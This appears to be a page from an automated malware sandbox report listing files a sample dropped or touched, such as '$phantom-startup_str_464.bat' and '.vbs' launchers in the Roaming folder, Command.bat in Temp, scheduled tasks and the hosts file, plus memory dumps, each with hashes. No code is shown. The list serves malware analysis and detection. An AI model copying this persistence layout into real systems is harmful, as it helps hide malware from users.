d600a6d0007c3a73f6ec4c7f9e211c2df282280eda8237bc1b2df118d15c6d6f

SHA512
eae4c5736c3e9beac89b8f580c227def39238e3b22f5cbd5b21ed5ea776396003326a2e48a237cb91a9a75f5e29646f875caa668e9b54da60bea150f83a96664

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
548dd08570d121a65e82abb7171cae1c

SHA1
1a1b5084b3a78f3acd0d811cc79dbcac121217ab

SHA256
cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc

SHA512
37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
73ce121a8ef6cddbd67bdb6870542225

SHA1
f09a1035d7baeff37fc65df1d398f7726c3bc5d3

SHA256
0a09f42d930fa4937deb77cebd7053643a1e9c92f928c40db4db9dde594a225f

SHA512
11aa551b4d10e02b10322963a21150b88b4eede661f534ecadc460bd48b8d26a2206a2d08020d187a9653d98b8759ca7e8229f4f3345af185c97fe50c516020c

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Filesize
330B

MD5
a73240f8d9bd912b0a0020a5fe82acd4

SHA1
7fba3929c636ed1b9154eabca3d13b99019b2a20

SHA256
7591a2a859cefe1ed14530659a372dc430ec0a4ea1af2ea5d2615269689af90c

SHA512
86d9a51a763a913f769c2d9cd1c08e33b76ebae2de14569202f0ff91d86762a49205e34c4d1b67b680a376d469239db8db4fa56c4f69ff29010581dd2eee99a9

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749

Filesize
330B

MD5
365376148eb98f9b9dc504471fc1501e

SHA1
14614aa142757b78c5fc8c6515d4e6743eb8bbe3

SHA256
addaf5e9c7ab44dcb9cfff75ac74f9bfec189076ccc9cab2f0c6c2ea2a0eab42

SHA512
4b7d96a2aee8ec4a9b63adbc94edcd877479f4cd6a6354a1de9a22f3d9ecf9f8f50057e5f11da2621728b8ed9b8cf64cc974dc88c907a13c772086bd533304c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Command.bat

Filesize
1.0MB

MD5
2115d9701ecfb6647aa14282f70a7162

SHA1
da630ffc488358e77a668e161cb1880bd69f7f0e

SHA256
eac2fe417e4a2dda7819ce73311cbc9f0367ebe040de8b60bcee6c0ff88241cb

SHA512
7d1a21fe3a1e37c5cc215ebde977bbe6d25ee850af2680f71da122e901b47a88eeb94d42cacc5e9c386973bd6cf54f70447983d8c2adba1ebb77d26557e09fad

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_22xia1ri.ctr.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_464.bat

Filesize
1.5MB

MD5
5b956910d7d28f6ee2ccb59d4c7b402f

SHA1
e99a814ba0a8824a2bb1625b4e2cb0aa828d26e1

SHA256
52aac553901b56007d9b40870447423fef70802593722eebd3a7326635074aaa

SHA512
1967ce3eb6344695012c1ebb3c78a2a86396c900783907b7f383bb60a40e622ce52af6b813d3cf17686edae560da6d61462fb1d5f7446114ab9a1c9e61e3f635

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_464.vbs

Filesize
124B

MD5
4b4fb764f8767f908faebbafb72b35a2

SHA1
3c0d570710e2bffe497654c44ece3817676a9f9d

SHA256
da23ceff5bcfa2a6f300404c2220710885177630f5ac9b0e527fbf288a91f777

SHA512
adfde57e9cd8206b3fbe1cb83f1a95d77acd6ea7f7a59359ef965143be6a4b52b867d6c16f2c3aa53b1dad74ccb622347a43cfeab28cc3a5ea6d81ff745f8154

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_741.vbs

Filesize
124B

MD5
bd92f6e38344b2bd51668186cbc8d343

SHA1
e1f747694f321e27c88419af3c7dca4f97a589d7

SHA256
6d5a79b0bbb5c14e6c7dd5a553bb1c7c97635a2389cbd6d2c6fe569cb53c517f

SHA512
4432c38db3ae9d32e78a447c41493915dbce5b6fd431466e3ab2e13d3dc789474bd1951535479ee80f032940175f465999d6172529983a42679594eaf98bb5d5

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

Filesize
2KB

MD5
8abf2d6067c6f3191a015f84aa9b6efe

SHA1
98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

SHA256
ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

SHA512
c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

Filesize
2KB

MD5
f313c5b4f95605026428425586317353

SHA1
06be66fa06e1cffc54459c38d3d258f46669d01a

SHA256
129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

SHA512
b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

Filesize
2KB

MD5
ceb7caa4e9c4b8d760dbf7e9e5ca44c5

SHA1
a3879621f9493414d497ea6d70fbf17e283d5c08

SHA256
98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

SHA512
1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

Filesize
2KB

MD5
7d612892b20e70250dbd00d0cdd4f09b

SHA1
63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

SHA256
727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

SHA512
f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

Filesize
2KB

MD5
0b990e24f1e839462c0ac35fef1d119e

SHA1
9e17905f8f68f9ce0a2024d57b537aa8b39c6708

SHA256
a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

SHA512
c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
4028457913f9d08b06137643fe3e01bc

SHA1
a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

SHA256
289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

SHA512
c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/600-347-0x000001F9ECFB0000-0x000001F9ECFC2000-memory.dmp

Filesize
72KB

Download
memory/600-283-0x000001F9ECE80000-0x000001F9ECF62000-memory.dmp

Filesize
904KB

Download
memory/600-346-0x000001F9ECC00000-0x000001F9ECC0A000-memory.dmp

Filesize
40KB

Download
memory/600-309-0x000001F9ECF60000-0x000001F9ECFB0000-memory.dmp

Filesize
320KB

Download
memory/600-310-0x000001F9ECBC0000-0x000001F9ECBDE000-memory.dmp

Filesize
120KB

Download
memory/972-108-0x00007FF87BDF0000-0x00007FF87BE00000-memory.dmp

Filesize
64KB

Download
memory/1120-110-0x00007FF87BDF0000-0x00007FF87BE00000-memory.dmp

Filesize
64KB

Download
memory/1168-109-0x00007FF87BDF0000-0x00007FF87BE00000-memory.dmp

Filesize
64KB

Download
memory/1280-101-0x00007FF87BDF0000-0x00007FF87BE00000-memory.dmp

Filesize
64KB

Download
memory/1368-371-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/1368-372-0x0000000004EC0000-0x0000000004F26000-memory.dmp

Filesize
408KB

Download
memory/1416-97-0x00007FF87BDF0000-0x00007FF87BE00000-memory.dmp

Filesize
64KB

Download
memory/1588-107-0x00007FF87BDF0000-0x00007FF87BE00000-memory.dmp

Filesize
64KB

Download
memory/1628-96-0x00007FF87BDF0000-0x00007FF87BE00000-memory.dmp

Filesize
64KB

Download
memory/1700-100-0x00007FF87BDF0000-0x00007FF87BE00000-memory.dmp

Filesize
64KB

Download
memory/1740-95-0x00007FF87BDF0000-0x00007FF87BE00000-memory.dmp

Filesize
64KB

Download
memory/1860-103-0x00007FF87BDF0000-0x00007FF87BE00000-memory.dmp

Filesize
64KB

Download
memory/1872-105-0x00007FF87BDF0000-0x00007FF87BE00000-memory.dmp

Filesize
64KB

Download
memory/1964-98-0x00007FF87BDF0000-0x00007FF87BE00000-memory.dmp

Filesize
64KB

Download
memory/2116-99-0x00007FF87BDF0000-0x00007FF87BE00000-memory.dmp

Filesize
64KB

Download
memory/2396-6-0x00000270A8570000-0x00000270A8592000-memory.dmp

Filesize
136KB

Download
memory/2396-15-0x00000270A85C0000-0x00000270A85C8000-memory.dmp

Filesize
32KB

Download
memory/2396-0-0x00007FF89CFA3000-0x00007FF89CFA5000-memory.dmp

Filesize
8KB

Download
memory/2396-12-0x00007FF89CFA0000-0x00007FF89DA61000-memory.dmp

Filesize
10.8MB

Download
memory/2396-13-0x00000270AAB30000-0x00000270AAB74000-memory.dmp

Filesize
272KB

Download
memory/2396-11-0x00007FF89CFA0000-0x00007FF89DA61000-memory.dmp

Filesize
10.8MB

Download
memory/2396-14-0x00000270AAC00000-0x00000270AAC76000-memory.dmp

Filesize
472KB

Download
memory/2396-46-0x00007FF89CFA0000-0x00007FF89DA61000-memory.dmp

Filesize
10.8MB

Download
memory/2396-16-0x00000270AAC80000-0x00000270AADE6000-memory.dmp

Filesize
1.4MB

Download
memory/2784-143-0x000002D4FB6B0000-0x000002D4FB704000-memory.dmp

Filesize
336KB

Download
memory/2784-367-0x000002D4FB940000-0x000002D4FB974000-memory.dmp

Filesize
208KB

Download
memory/3384-47-0x0000000002260000-0x000000000228A000-memory.dmp

Filesize
168KB

Download
memory/3384-94-0x00007FF87BDF0000-0x00007FF87BE00000-memory.dmp

Filesize
64KB

Download
memory/3536-106-0x00007FF87BDF0000-0x00007FF87BE00000-memory.dmp

Filesize
64KB

Download
memory/3616-104-0x00007FF87BDF0000-0x00007FF87BE00000-memory.dmp

Filesize
64KB

Download
memory/4784-159-0x000002A9E9D00000-0x000002A9E9DC4000-memory.dmp

Filesize
784KB

Download
memory/4784-158-0x000002A9E7680000-0x000002A9E7688000-memory.dmp

Filesize
32KB

Download
memory/5016-102-0x00007FF87BDF0000-0x00007FF87BE00000-memory.dmp

Filesize
64KB

Download